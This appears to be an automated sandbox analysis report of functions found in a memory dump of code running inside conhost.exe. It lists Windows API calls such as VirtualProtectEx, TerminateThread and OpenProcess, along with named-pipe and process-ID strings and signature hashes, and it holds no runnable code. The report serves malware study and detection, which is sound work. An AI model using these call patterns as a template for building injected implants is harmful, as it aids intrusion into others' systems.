Instruction ID: 646491faba9a53c339965c4e9ab22e3d11ee537af48d1e4fff4daaef339a75f7
Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction Fuzzy Hash: 7E51AF31209B4795EB06EB24F8662F823A2BB45794F840A35F6AC077A9EF78D518C340

Function 000001FD186D35C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,000001FD186D24D1), ref: 000001FD186D35EB
HeapAlloc.KERNEL32(?,?,?,?,?,000001FD186D24D1), ref: 000001FD186D35FE
StrCmpNIW.SHLWAPI(?,?,?,?,?,000001FD186D24D1), ref: 000001FD186D3673
GetProcessHeap.KERNEL32(?,?,?,?,?,000001FD186D24D1), ref: 000001FD186D36D9
HeapFree.KERNEL32(?,?,?,?,?,000001FD186D24D1), ref: 000001FD186D36E7

Strings

$rbx-, xrefs: 000001FD186D366C

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: $rbx-
API String ID: 756756679-3661604363
Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction ID: 7ad5e0cdfcc95334fb8fd4ec7dc1dc4253cbf49502700603a4c06fc108fb9e49
Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction Fuzzy Hash: 8D318E32709B9286EB11DF16FA46BB9A7A2FB44B84F084134EF8807B55FF38C4658700

Function 000001FD186DC940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000001FD186DC94F
SetLastError.KERNEL32 ref: 000001FD186DC96E
FlsSetValue.KERNEL32 ref: 000001FD186DC997
FlsSetValue.KERNEL32 ref: 000001FD186DC9A8
FlsSetValue.KERNEL32 ref: 000001FD186DC9B9

Part of subcall function 000001FD186DD2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000001FD186D674A), ref: 000001FD186DD2B6
Part of subcall function 000001FD186DD2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000001FD186D674A), ref: 000001FD186DD2C0

SetLastError.KERNEL32 ref: 000001FD186DC9DC

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: ErrorLast$Value$FreeHeap
String ID:
API String ID: 365477584-0
Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction ID: a907ab31da723ac85bdfd29137dc5d0cbe96778529b111c9dbc18d706e002bcb
Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction Fuzzy Hash: 1E111831659647C2FB58F772B8677FE2253AB85BA0F949734F9A65A3CADE38C4014300

Function 000001FD186D1A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000001FD186D1A56
K32GetModuleFileNameExW.KERNEL32 ref: 000001FD186D1A74
PathFindFileNameW.SHLWAPI ref: 000001FD186D1A83
lstrlenW.KERNEL32 ref: 000001FD186D1A8F
StrCpyW.SHLWAPI ref: 000001FD186D1AA2
CloseHandle.KERNEL32 ref: 000001FD186D1AB0

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction ID: 994895f683b435be3ff243f7ab7ada42fefba1b26e7359f05ff014dcfdd1bd54
Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction Fuzzy Hash: 9A01DB35718B4286EB14DB12F8597B9A3A2F788FD0F484135EE9D43B54EE78C585C740

Function 000001FD186D3E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,000001FD186D3AAC), ref: 000001FD186D3E30
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001FD186D3AAC), ref: 000001FD186D3E3E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001FD186D3AAC), ref: 000001FD186D3E60
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001FD186D3AAC), ref: 000001FD186D3E7E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001FD186D3AAC), ref: 000001FD186D3E9F
TerminateThread.KERNEL32(?,?,?,?,?,000001FD186D3AAC), ref: 000001FD186D3EAE

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction ID: ff181f9c9a7897f34b16c56e0406d8d5e4428b24093c32083cc7f3fa565c28bd
Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction Fuzzy Hash: 50011B75219B42C2EB25DB21F85A7B563A2AB85B85F040135E98D073A4FF3DC1588740

Function 000001FD186D1AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000001FD186D1AF4
StrCmpNIW.SHLWAPI ref: 000001FD186D1B0E
lstrlenW.KERNEL32 ref: 000001FD186D1B1D
StrCpyW.SHLWAPI ref: 000001FD186D1B32

Strings

\\?\, xrefs: 000001FD186D1B02

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction ID: 1c9aa7b96fdd696cf103e787c51e7c4cccc78a8d00351f7a2e017d2962e21e1f
Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction Fuzzy Hash: 12F04472318B86D2E720CB21F5893F9A363F744B88F844135EA8946954EE6DC689C700

Function 000001FD186D3708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI(?,?,00000000,000001FD186D275A), ref: 000001FD186D372A
StrCpyW.SHLWAPI ref: 000001FD186D373A
StrCatW.SHLWAPI ref: 000001FD186D3746
PathCombineW.SHLWAPI(?,?,00000000,000001FD186D275A), ref: 000001FD186D3754

Strings

\\.\pipe\, xrefs: 000001FD186D3720

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction ID: 3c15d1a11382aae84e62f0bfbc96c186085b4c1163e30c35cfdb9af19976f5db
Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction Fuzzy Hash: 95F08C74718B8282EB54CB13BA191B9A262BB48FC0F488131FE5A0BB18FE2CC446C700

Function 000001FD186DB904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000001FD186DB929
GetProcAddress.KERNEL32 ref: 000001FD186DB93F
FreeLibrary.KERNEL32 ref: 000001FD186DB95B

Strings

mscoree.dll, xrefs: 000001FD186DB920
CorExitProcess, xrefs: 000001FD186DB938

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction ID: 2733034fc366f125efd7768d010bfb3152609d5befca942c9e76f27b5a8d753b
Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction Fuzzy Hash: 99F0307125974281EB14CB24F8967B96362EB89761F540739EAAA495E8DF2CC448C740

Function 000001FD186D5810 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001FD186D5896

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction ID: be0334f446da401b8d26960be9932e2715ff3c1a0ccdba57b86d4208490c8057
Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction Fuzzy Hash: 3002B53621DB8586E760CB55F4957BAB7A2F384794F104126FACE87BA8DB7DC484CB00

Function 000001FD186D2C80 Relevance: 7.6, APIs: 6, Instructions: 131COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 000001FD186D2CAD
TlsGetValue.KERNEL32 ref: 000001FD186D2CBC
TlsGetValue.KERNEL32 ref: 000001FD186D2CCB
TlsSetValue.KERNEL32 ref: 000001FD186D2E0F
TlsSetValue.KERNEL32 ref: 000001FD186D2E1E
TlsSetValue.KERNEL32 ref: 000001FD186D2E2D

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction ID: ce3e39a34d6e425e994af073e649132c5dc6850918b34bf8a61b4df71d278df2
Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction Fuzzy Hash: 2751A435608A0287E765CF16F456BFAB3A2F788B94F504239EE9A43754DF78D845CB00

Function 000001FD186D2AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 000001FD186D2AE1
TlsGetValue.KERNEL32 ref: 000001FD186D2AF0
TlsGetValue.KERNEL32 ref: 000001FD186D2AFF
TlsSetValue.KERNEL32 ref: 000001FD186D2C3B
TlsSetValue.KERNEL32 ref: 000001FD186D2C4A
TlsSetValue.KERNEL32 ref: 000001FD186D2C59

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction ID: d4a39735f6b28e773b2e4a7e2fddb3bc6517631a46f63e32ad56cd9b36ab03f1
Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction Fuzzy Hash: BE517E35218A4287E764CF16F8517BAB3A3F789B94F504239EE9A43754DF79D806CB00

Function 000001FD186D5E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001FD186D5E66

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction ID: 45e2a1e3ae6f8ce571f98fcc9ac2b75d591273fb636eb5935ebe342970c3509b
Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction Fuzzy Hash: 9661C53612DA8586E760CB15F4567BAB7A2F388788F100226FACD47BA8DB7DC540CF41

Function 000001FD186D3EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,000001FD186D3A5B), ref: 000001FD186D3EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001FD186D3A5B), ref: 000001FD186D3F0E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001FD186D3A5B), ref: 000001FD186D3F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001FD186D3A5B), ref: 000001FD186D3F47
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001FD186D3A5B), ref: 000001FD186D3F68

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: 616fc8e841c2245b51791be6a37ee32d8900f2bb04da3a702710a6d3d6dbec9f
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: E9112E36A0974293EB24DB21F5052BA67B1FB44B80F140136FA8D03794FB7DC955C784

Function 000001FD186D8CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001FD186D8CCB
_IsNonwritableInCurrentImage.LIBCMT ref: 000001FD186D8D62
RtlUnwindEx.NTDLL ref: 000001FD186D8DBC

Strings

csm, xrefs: 000001FD186D8D49

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 45de8e6a20390779af9f9e1f454ddde026f3e10040f5e7abd99963213620a969
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 2B51A2323196028ADB54CF19F449BBC7793E394B98F544A35FA8E47788DB78C841CB00

Function 000001FD186DAAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001FD186DAAD4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000001FD186DABBC

Strings

csm, xrefs: 000001FD186DAAF6
csm, xrefs: 000001FD186DAC0E

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: 65afe3b49f3e94a000483bd8e0f4653e7ac2ad2b90735d2ef3b6efecdb3f5d06
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: B5515D3220C6828BEB74CF22A5463BC77A3F754B96F144326EAD947B95CB38C452C701

Function 000001FD186DA6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 000001FD186DA75B
_CallSETranslator.LIBVCRUNTIME ref: 000001FD186DA7A7

Strings

RCC, xrefs: 000001FD186DA777
MOC, xrefs: 000001FD186DA76F

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: c9c92eabbec959ce24350a47c370c98e59e4e30f137f6e1398bcc687353b0223
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: EE615832518B8585EB20DB15F4427FEB7A1F785B99F044325EBD81BB99DB78C190CB00

Function 000001FD17769EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001FD17769ED4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000001FD17769FBC

Strings

csm, xrefs: 000001FD1776A00E
csm, xrefs: 000001FD17769EF6

Memory Dump Source

Source File: 00000024.00000003.2618275587.000001FD17760000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FD17760000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_3_1fd17760000_conhost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: 430e7c8bcc295388a9f2a6e521ba53b2e508c631e94a1a77aabe53e6d3a7ff2b
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: AD518F322083828AFB74AF22A1443F877A6F355B94F174135FE9947BA9DB39C558CB01

Function 000001FD186D3950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

StrCmpNW.SHLWAPI ref: 000001FD186D3972
StrStrW.SHLWAPI ref: 000001FD186D3990
StrToIntW.SHLWAPI ref: 000001FD186D39B7

Part of subcall function 000001FD186D1A30: OpenProcess.KERNEL32 ref: 000001FD186D1A56
Part of subcall function 000001FD186D1A30: K32GetModuleFileNameExW.KERNEL32 ref: 000001FD186D1A74
Part of subcall function 000001FD186D1A30: PathFindFileNameW.SHLWAPI ref: 000001FD186D1A83
Part of subcall function 000001FD186D1A30: lstrlenW.KERNEL32 ref: 000001FD186D1A8F
Part of subcall function 000001FD186D1A30: StrCpyW.SHLWAPI ref: 000001FD186D1AA2
Part of subcall function 000001FD186D1A30: CloseHandle.KERNEL32 ref: 000001FD186D1AB0

Part of subcall function 000001FD186D3F88: StrCmpNIW.SHLWAPI(?,?,?,000001FD186D272F), ref: 000001FD186D3FA0

Strings

pid_, xrefs: 000001FD186D3968

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

